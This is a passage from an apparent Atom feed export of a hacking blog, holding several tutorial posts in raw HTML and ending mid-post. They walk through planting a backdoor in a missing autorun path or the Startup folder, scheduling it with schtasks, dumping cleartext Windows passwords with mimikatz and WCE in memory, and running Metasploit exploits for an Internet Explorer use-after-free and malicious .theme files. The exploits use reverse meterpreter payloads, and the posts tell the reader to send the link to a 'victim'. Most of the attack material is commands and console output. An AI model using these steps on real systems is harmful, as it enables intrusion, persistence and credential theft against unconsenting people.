(3)Now from uploaded directory execute following command to get missing autoruns of machine&lt;br /&gt;
&lt;br /&gt;
autorunsc.exe -a | findstr /n /R &quot;File\ not\ found&quot;&lt;br /&gt;
&lt;br /&gt;
(4)Now we have list of file which is missing ; these files are run at startup time.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyw-k4dgLXwm534X-wrC4c4MOr1yKQnVTYa5Q2OL4aXnjfct0qthb_wOIHudFFgfiBPqJyDTM3Yvfmy4puqS7UapAHEg4ve4xp0ewJmGsSxhGIxqIbDFwehiIP-py1Qwus2zityk72e2v/s1600/autoruns-upload.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;missing-autoruns&quot; border=&quot;0&quot; height=&quot;260&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyw-k4dgLXwm534X-wrC4c4MOr1yKQnVTYa5Q2OL4aXnjfct0qthb_wOIHudFFgfiBPqJyDTM3Yvfmy4puqS7UapAHEg4ve4xp0ewJmGsSxhGIxqIbDFwehiIP-py1Qwus2zityk72e2v/s400/autoruns-upload.PNG&quot; title=&quot;missing-autoruns&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
(5)In my case you can see that uTorrent.exe is missing .&lt;br /&gt;
&lt;br /&gt;
(6)So now i rename my backdoor to uTorrent .exe &amp;amp; uploaded to the path where it`s not found.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZzhPJ1mvb9yp7ZD3aQGKWhLRpKtZtHhu4jwNBaf_pi3u8Ys_jM9c9hpvGcVk-K4nIC1dgh4NU8MtPtxgvQbnIZ0O3vbzn-Pm7MDOl2xVnKLlQC1RNaGXD4TUv7EetgafwCN81ZImn-QZ/s1600/upload-missing-autoruns.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;upload-backdoor&quot; border=&quot;0&quot; height=&quot;35&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCZzhPJ1mvb9yp7ZD3aQGKWhLRpKtZtHhu4jwNBaf_pi3u8Ys_jM9c9hpvGcVk-K4nIC1dgh4NU8MtPtxgvQbnIZ0O3vbzn-Pm7MDOl2xVnKLlQC1RNaGXD4TUv7EetgafwCN81ZImn-QZ/s320/upload-missing-autoruns.PNG&quot; title=&quot;upload-backdoor&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now whenever machine is restarted you get shell.(Don`t forget to running multi/handler!!!)&lt;br /&gt;
&lt;br /&gt;
For just POC ; you can run autorunsc.exe again to find out whether&amp;nbsp; our backdoor (uTorrent.exe) is written successfully or not?&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGC2_IUIo-BIOe1MIxIQUe8rz0aUXFzNYvCH2DAXsU-Yx-lBFicalBosw6q0ONgBYi9w3H9hR1Ob8ec0hpeB1kMAjfU-wEbuzrFXINVwnXUhdRj-eVNpaPtAey4R4x4UycS-AVrkGDehL/s1600/Not-Missing-autoruns.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;missing -autorun-backdoor&quot; border=&quot;0&quot; height=&quot;113&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOGC2_IUIo-BIOe1MIxIQUe8rz0aUXFzNYvCH2DAXsU-Yx-lBFicalBosw6q0ONgBYi9w3H9hR1Ob8ec0hpeB1kMAjfU-wEbuzrFXINVwnXUhdRj-eVNpaPtAey4R4x4UycS-AVrkGDehL/s320/Not-Missing-autoruns.PNG&quot; title=&quot;missing -autorun-backdoor&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
In above image you can see that&amp;nbsp; uTorrent.exe is no longer missing which missed in previous step.&lt;br /&gt;
&lt;br /&gt;
(B)Now this is second method; but may be suspicious.&lt;br /&gt;
&lt;br /&gt;
When you put binary in start up folder it will run automatically when pc is started.&lt;br /&gt;
&lt;br /&gt;
Startup Folder Location in windows Xp:-&lt;br /&gt;
&lt;br /&gt;
C:\Documents and Settings\&quot;nirav&quot;\Start Menu\Programs\Startup&lt;br /&gt;
&lt;br /&gt;
Startup Folder location In windows 7:-&lt;br /&gt;
&lt;br /&gt;
C:\Users\username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup&lt;br /&gt;
&lt;br /&gt;
So upload your binary to start up folder ;make it hidden using following command.&lt;br /&gt;
attrb +h backdoor.exe&lt;br /&gt;
Restart machine &amp;amp; Hopefully you will get shell.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/3685936234014291127/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3685936234014291127'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/3685936234014291127'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html' title='Get shell using Missing Autoruns.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhyw-k4dgLXwm534X-wrC4c4MOr1yKQnVTYa5Q2OL4aXnjfct0qthb_wOIHudFFgfiBPqJyDTM3Yvfmy4puqS7UapAHEg4ve4xp0ewJmGsSxhGIxqIbDFwehiIP-py1Qwus2zityk72e2v/s72-c/autoruns-upload.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-7776887405674294184</id><published>2013-10-04T23:20:00.002+05:30</published><updated>2014-02-10T00:36:23.818+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><category scheme="http://www.blogger.com/atom/ns#" term="post-exploitation"/><title type='text'>Schedule Task in windows after Exploitation.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Recently in Derbycon &lt;a href=&quot;https://twitter.com/mubix&quot; target=&quot;_blank&quot;&gt;mubix&lt;/a&gt; &amp;amp; &lt;a href=&quot;https://twitter.com/carnal0wnage&quot; target=&quot;_blank&quot;&gt;carnal0wnage&lt;/a&gt; present &quot;windows attacks at is the new black &quot;. It`s really great presentation . You can find it &lt;a href=&quot;http://www.slideshare.net/mubix/windows-attacks-at-is-the-new-black-26665607&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;. So i will put&amp;nbsp; their method here.&lt;br /&gt;
&lt;br /&gt;
After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor &amp;amp; persistent backdoor . But most of times it will caught by AV. You can create FUD payload using &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/bypass-av-using-veil-in-backtrack.html&quot; target=&quot;_blank&quot;&gt;Veil&lt;/a&gt;.We can also create schedule task for our backdoor.&lt;br /&gt;
&lt;br /&gt;
First create one batch file , put following code in it&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;@echo off&lt;br /&gt;&quot;C:\Documents and Settings\nirav\Desktop\backdoor.exe&quot;&lt;/span&gt; &lt;br /&gt;
&lt;br /&gt;
Then upload your backdoor &amp;amp; created batch file.Please adjust path of batch file according to your upload path of backdoor.&lt;br /&gt;
&lt;br /&gt;
Get clear text password:-&lt;br /&gt;
&lt;br /&gt;
Following are different methods to get clear text password of windows.&lt;br /&gt;
&lt;br /&gt;
(1)using &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/03/get-clear-text-credentials-of-windows.html&quot; target=&quot;_blank&quot;&gt;mimikatz&lt;/a&gt; or &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/02/how-to-get-windows-passwords-in-plain.html&quot; target=&quot;_blank&quot;&gt;wce&lt;/a&gt; get clear text password of victim.&lt;br /&gt;
&lt;br /&gt;
(2) You can also use &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/08/mimikatz-alpha-to-get-clear-text.html&quot; target=&quot;_blank&quot;&gt;mimikatz password dump method &lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp; meterpreter &amp;gt; load mimikatz &lt;br /&gt;
&amp;nbsp;&amp;nbsp; meterpreter &amp;gt; help mimikatz&lt;br /&gt;
&amp;nbsp;&amp;nbsp; meterpreter &amp;gt; kerberos&lt;br /&gt;
&amp;nbsp;&amp;nbsp; meterpreter &amp;gt; mimikatz_command -h&lt;br /&gt;
&amp;nbsp;&amp;nbsp; meterpreter &amp;gt;  mimikatz_command -f sekurlsa::logonPasswords -a &quot;full&quot;&lt;br /&gt;
&lt;br /&gt;
(4)You can use wce &amp;amp; mimikatz in memory without uploading binary.&lt;br /&gt;
&lt;br /&gt;
(a)WCE in memory:-&lt;br /&gt;
&lt;br /&gt;
cd %systemroot%&lt;br /&gt;
cd system32&lt;br /&gt;
pwd&lt;br /&gt;
execute -H -m -d calc.exe -f /root/wce.exe -a &quot;-o foo.txt&quot; &lt;br /&gt;
cat foo.txt&lt;br /&gt;
&lt;br /&gt;
(b)Mimikatz in memory:-&lt;br /&gt;
&lt;br /&gt;
cd %systemroot%&lt;br /&gt;
cd system32&lt;br /&gt;
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a &#39;&quot;sekurlsa::logonPasswords full&quot; exit&#39;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOvtXvPi0Ts9gsz8SOsJlK5Gw8PT5i42KDI63iT4KJ8f3yN1oCNQ3yh8S5cGxTlTSt1UJgLvE_kUDSC2j2jAHuZyZpTHhfA3hoc51NwD0tocktSKrOephSuV4HbLmPCdDdnQPdhOtRRB8R/s1600/upload&amp;amp;mimikatz.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;get-clear-text-password&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOvtXvPi0Ts9gsz8SOsJlK5Gw8PT5i42KDI63iT4KJ8f3yN1oCNQ3yh8S5cGxTlTSt1UJgLvE_kUDSC2j2jAHuZyZpTHhfA3hoc51NwD0tocktSKrOephSuV4HbLmPCdDdnQPdhOtRRB8R/s1600/upload&amp;amp;mimikatz.PNG&quot; title=&quot;get-clear-text-password&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
So till now i upload one batch file ; backdoor &amp;amp; get clear text password.&lt;br /&gt;
&lt;br /&gt;
Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit &lt;a href=&quot;http://technet.microsoft.com/en-us/library/cc772785%28v=ws.10%29.aspx&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed &amp;amp; i will get shell. &lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: red;&quot;&gt;C:\Documents and Settings\nirav&amp;gt; SchTasks /Create /SC DAILY /TN Evil2 /TR &quot;\&quot;C:\Documents and Settings\nirav\Desktop\sch.bat&quot;&quot; /ST 22:16:00&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
It will ask to enter password which we got before. &lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMursMC_R8jQIAcdgdMKBbYESUZ8l2jQYmZyx_npVqPvXfQPXkA7qIE8Ur6wWHtZo_c1MCZK1t3icYFVYBBJ6X2QrsGDVMsErvMAMxitx966AG18gJiI963cIdU37MXPxaP0tfb1FM_Hhy/s1600/schtasks.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;schedule-task&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMursMC_R8jQIAcdgdMKBbYESUZ8l2jQYmZyx_npVqPvXfQPXkA7qIE8Ur6wWHtZo_c1MCZK1t3icYFVYBBJ6X2QrsGDVMsErvMAMxitx966AG18gJiI963cIdU37MXPxaP0tfb1FM_Hhy/s1600/schtasks.PNG&quot; title=&quot;schedule-task&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
You can also use different option like ONIDLE, ONLOGON, and ONSTART &amp;amp; execute different binary according to your need.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/7776887405674294184/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/7776887405674294184'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/7776887405674294184'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html' title='Schedule Task in windows after Exploitation.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOvtXvPi0Ts9gsz8SOsJlK5Gw8PT5i42KDI63iT4KJ8f3yN1oCNQ3yh8S5cGxTlTSt1UJgLvE_kUDSC2j2jAHuZyZpTHhfA3hoc51NwD0tocktSKrOephSuV4HbLmPCdDdnQPdhOtRRB8R/s72-c/upload&amp;mimikatz.PNG" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-4483045002241279396</id><published>2013-10-01T22:07:00.001+05:30</published><updated>2013-10-01T22:07:59.959+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Exploit For All IE version(CVE-2013-3893).</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (&lt;a class=&quot;jive-link-external-small&quot; href=&quot;http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893&quot;&gt;CVE-2013-3893&lt;/a&gt;)
 that has been exploited in the wild, which was initially discovered in 
Japan. At the time of this writing there is still no patch available, 
but there is still at least a temporary fix-it that you can apply from 
Microsoft, which &lt;a class=&quot;jive-link-external-small&quot; href=&quot;http://technet.microsoft.com/en-us/security/advisory/2887505&quot;&gt;can be downloaded here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.&lt;br /&gt;
&lt;br /&gt;
For more technical Detail view metasploit blog &lt;a href=&quot;https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; .&amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
The Metasploit module currently can be only tested on Internet Explorer 9
 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/windows/browser/ie_setmousecapture_uaf&lt;br /&gt;
msf exploit(ie_setmousecapture_uaf) &amp;gt; set srvhost 192.168.56.1&lt;br /&gt;
srvhost =&amp;gt; 192.168.56.1&lt;br /&gt;
msf exploit(ie_setmousecapture_uaf) &amp;gt; set uripath /&lt;br /&gt;
uripath =&amp;gt; /&lt;br /&gt;
msf exploit(ie_setmousecapture_uaf) &amp;gt; set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
payload =&amp;gt; windows/meterpreter/reverse_tcp&lt;br /&gt;
msf exploit(ie_setmousecapture_uaf) &amp;gt; set lhost 192.168.56.1&lt;br /&gt;
lhost =&amp;gt; 192.168.56.1&lt;br /&gt;
msf exploit(ie_setmousecapture_uaf) &amp;gt; set lport 443&lt;br /&gt;
lport =&amp;gt; 443&lt;br /&gt;
msf exploit(ie_setmousecapture_uaf) &amp;gt; run&lt;br /&gt;
[*] Exploit running as background job.&lt;br /&gt;
[*] Started reverse handler on 192.168.56.1:443 &lt;br /&gt;
[*] Using URL: http://192.168.56.1:8080/&lt;br /&gt;
[*] Server started.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Send this link to victim. As soon as he open link you will get meterpreter shell.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-qQBktfWzOz-4eYvLmaOLkv8DOBr4claPKye5ghq7SWzHuTWKsD6-vUwcPRH8soOGfH6agIsieYeMFsMjA8OhU6nggVTt6FsSipXuoo-Xd52SkGhshgpzxj3Fn0oVxiDiIdBTBTP_uuYr/s1600/ie_user_after_Free.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;exploit-for-CVE-2013-3893&quot; border=&quot;0&quot; height=&quot;178&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-qQBktfWzOz-4eYvLmaOLkv8DOBr4claPKye5ghq7SWzHuTWKsD6-vUwcPRH8soOGfH6agIsieYeMFsMjA8OhU6nggVTt6FsSipXuoo-Xd52SkGhshgpzxj3Fn0oVxiDiIdBTBTP_uuYr/s400/ie_user_after_Free.PNG&quot; title=&quot;IE-exploit&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/4483045002241279396/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/4483045002241279396'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/4483045002241279396'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html' title='Exploit For All IE version(CVE-2013-3893).'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-qQBktfWzOz-4eYvLmaOLkv8DOBr4claPKye5ghq7SWzHuTWKsD6-vUwcPRH8soOGfH6agIsieYeMFsMjA8OhU6nggVTt6FsSipXuoo-Xd52SkGhshgpzxj3Fn0oVxiDiIdBTBTP_uuYr/s72-c/ie_user_after_Free.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-6183865506309420812</id><published>2013-09-28T18:37:00.000+05:30</published><updated>2013-09-28T18:38:41.919+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="metasploit"/><title type='text'>Hack local network PC using windows theam file.</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
This module exploits a vulnerability mainly affecting Microsoft &lt;br /&gt;
Windows XP and Windows 2003. The vulnerability exists in the &lt;br /&gt;
handling of the Screen Saver path, in the [boot] section. An &lt;br /&gt;
arbitrary path can be used as screen saver, including a remote SMB &lt;br /&gt;
resource, which allows for remote code execution when a malicious &lt;br /&gt;
.theme file is opened, and the &quot;Screen Saver&quot; tab is viewed. The &lt;br /&gt;
code execution is also triggered if the victim installs the &lt;br /&gt;
malicious theme and stays away from the computer, when Windows tries &lt;br /&gt;
to display the screensaver.&lt;br /&gt;
&lt;br /&gt;
Available targets:&lt;br /&gt;
&amp;nbsp; Id&amp;nbsp; Name&lt;br /&gt;
&amp;nbsp; --&amp;nbsp; ----&lt;br /&gt;
&amp;nbsp; 0&amp;nbsp;&amp;nbsp; Windows XP SP3 / Windows 2003 SP2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
msf &amp;gt; use exploit/windows/fileformat/ms13_071_theme&lt;br /&gt;
msf exploit(ms13_071_theme) &amp;gt; set srvhost 192.168.56.1&lt;br /&gt;
srvhost =&amp;gt; 192.168.56.1&lt;br /&gt;
msf exploit(ms13_071_theme) &amp;gt; set payload windows/meterpreter/reverse_tcp&lt;br /&gt;
payload =&amp;gt; windows/meterpreter/reverse_tcp&lt;br /&gt;
msf exploit(ms13_071_theme) &amp;gt; set lhost 192.168.56.1&lt;br /&gt;
lhost =&amp;gt; 192.168.56.1&lt;br /&gt;
msf exploit(ms13_071_theme) &amp;gt; run&lt;br /&gt;
[*] Exploit running as background job.&lt;br /&gt;
&lt;br /&gt;
[*] Started reverse handler on 192.168.56.1:4444 &lt;br /&gt;
msf exploit(ms13_071_theme) &amp;gt; [*] Generating our malicious executable...&lt;br /&gt;
[*] Creating &#39;msf.theme&#39; file ...&lt;br /&gt;
[+] msf.theme stored at /root/.msf4/local/msf.theme&lt;br /&gt;
[+] Let your victim open msf.theme&lt;br /&gt;
[*] Ready to deliver your payload on \\192.168.56.1\qggdxi\vleGT.scr&lt;br /&gt;
[*] Server started.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZjjVeYBgdMEONOHl1Kr90UW9Bv00LizZPFSm5n7dj5SUuEHsYko1DvfY87MUkD2Zs9UP5sr60NiSVwCCDRJOj-XHGSog_ZWPnWye_8921ZxLf5MlNJwkSyRxC8peq7l-2C5hFBxN37Vd7/s1600/xp-hack.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;windows-xp-infected-theam-file&quot; border=&quot;0&quot; height=&quot;192&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZjjVeYBgdMEONOHl1Kr90UW9Bv00LizZPFSm5n7dj5SUuEHsYko1DvfY87MUkD2Zs9UP5sr60NiSVwCCDRJOj-XHGSog_ZWPnWye_8921ZxLf5MlNJwkSyRxC8peq7l-2C5hFBxN37Vd7/s320/xp-hack.PNG&quot; title=&quot;windows-xp-infected-theam-file&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
Then send your generated theam file to victim using \\192.168.56.1\qggdxi\vleGT.scr link ;he should open it through using smb. So tell him to put this link to run .&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnAeSyI1sPGPcUhcSsSwderbDsJQJTCoUOeIVBwGsUFWPF6XviKFXMZurm6sf2f8WUxShnEkFCDdhJ9MM7jCqrIsJ06dxnkClXVAxplSqS2dUa02ZuvB6wxFWpnHRMhRFb9_CpEPuTdqJU/s1600/send.PNG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;windows-xp-infected-theam-file&quot; border=&quot;0&quot; height=&quot;198&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnAeSyI1sPGPcUhcSsSwderbDsJQJTCoUOeIVBwGsUFWPF6XviKFXMZurm6sf2f8WUxShnEkFCDdhJ9MM7jCqrIsJ06dxnkClXVAxplSqS2dUa02ZuvB6wxFWpnHRMhRFb9_CpEPuTdqJU/s320/send.PNG&quot; title=&quot;windows-xp-infected-theam-file&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
As soon as he open file you will get session.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJIca7Nl0Z9oLPdVJ63nVck7b3HX6X_-h6Ei_HSK6acv5fekaguDHLhzMnw5iGiK8RznMlsDc30fe2TViuaD853jW6kiP9IsXwlkH3iuNb3CWpJp_WTu0o2AIYkpf7_-TChyphenhyphenwkwt-3aCI5/s1600/session.bmp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;windows-xp-infected-theam-file&quot; border=&quot;0&quot; height=&quot;79&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJIca7Nl0Z9oLPdVJ63nVck7b3HX6X_-h6Ei_HSK6acv5fekaguDHLhzMnw5iGiK8RznMlsDc30fe2TViuaD853jW6kiP9IsXwlkH3iuNb3CWpJp_WTu0o2AIYkpf7_-TChyphenhyphenwkwt-3aCI5/s320/session.bmp&quot; title=&quot;windows-xp-infected-theam-file&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='https://tipstrickshack.blogspot.com/feeds/6183865506309420812/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/6183865506309420812'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/5662588500512873533/posts/default/6183865506309420812'/><link rel='alternate' type='text/html' href='https://tipstrickshack.blogspot.com/2013/09/hack-local-network-pc-using-windows.html' title='Hack local network PC using windows theam file.'/><author><name>nirav desai</name><uri>http://www.blogger.com/profile/08873815741123225210</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZjjVeYBgdMEONOHl1Kr90UW9Bv00LizZPFSm5n7dj5SUuEHsYko1DvfY87MUkD2Zs9UP5sr60NiSVwCCDRJOj-XHGSog_ZWPnWye_8921ZxLf5MlNJwkSyRxC8peq7l-2C5hFBxN37Vd7/s72-c/xp-hack.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5662588500512873533.post-8876062821004453117</id><published>2013-09-18T21:17:00.003+05:30</published><updated>2013-09-18T21:19:25.239+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="post-exploitation"/><title type='text'>Extract &amp; decrypt Chrome &amp; IE passwords from Remote PC</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
In &lt;a href=&quot;http://tipstrickshack.blogspot.com/2013/09/extract-decrypt-passwords-from-firefox.html&quot; target=&quot;_blank&quot;&gt;previous post&lt;/a&gt; i mentioned how we can extract saved passwords from firefox &amp;amp; thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome &amp;amp; IE. If you want to know more technical detail you can visit this &lt;a href=&quot;http://insecurety.net/?p=299&quot; target=&quot;_blank&quot;&gt;site&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
